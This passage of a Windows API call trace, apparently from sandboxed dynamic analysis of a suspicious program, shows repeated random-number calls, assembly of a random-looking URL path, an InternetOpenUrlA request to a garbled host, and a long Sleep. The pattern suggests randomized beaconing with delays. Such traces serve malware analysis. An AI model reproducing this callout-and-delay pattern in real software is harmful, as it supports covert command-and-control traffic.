lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0271.366] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.366] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.366] GetProcessHeap () returned 0x440000 [0271.366] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x95) returned 0x3a16800 [0271.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16801, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a16801) returned 0x0 [0271.367] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.367] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.368] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.368] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.369] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.370] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.370] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.371] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.372] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16815, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a16815) returned 0x0 [0271.373] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.373] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.374] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.375] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.375] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.376] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.377] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.377] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0271.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.378] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.378] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0271.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.379] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.380] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.381] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.381] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.395] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.395] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.396] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.397] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.397] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0271.398] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16839, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x3a16839) returned 0x0 [0271.399] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.400] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.401] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.403] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0271.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0271.536] GetProcessHeap () returned 0x440000 [0271.536] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0271.536] lstrcpyA (in: lpString1=0x473770, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0271.536] lstrcatA (in: lpString1="\x81\x03", lpString2="/0rhNelvze9kk8mw02u5/8j61ti0i8ugf8gsHkYolkqzhb6yt8ypg47i/9kglHbyxuexaXqq2adkgymWcNbjv57oUTdjc2qluin1lgef/" | out: lpString1="\x81\x03/0rhNelvze9kk8mw02u5/8j61ti0i8ugf8gsHkYolkqzhb6yt8ypg47i/9kglHbyxuexaXqq2adkgymWcNbjv57oUTdjc2qluin1lgef/") returned="\x81\x03/0rhNelvze9kk8mw02u5/8j61ti0i8ugf8gsHkYolkqzhb6yt8ypg47i/9kglHbyxuexaXqq2adkgymWcNbjv57oUTdjc2qluin1lgef/" [0271.536] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0271.536] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/0rhNelvze9kk8mw02u5/8j61ti0i8ugf8gsHkYolkqzhb6yt8ypg47i/9kglHbyxuexaXqq2adkgymWcNbjv57oUTdjc2qluin1lgef/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0271.536] GetProcessHeap () returned 0x440000 [0271.536] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0271.536] GetProcessHeap () returned 0x440000 [0271.536] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16800 | out: hHeap=0x440000) returned 1 [0271.536] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0271.537] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0271.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0271.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0271.537] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0271.537] Sleep (dwMilliseconds=0x1c778) [0271.653] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 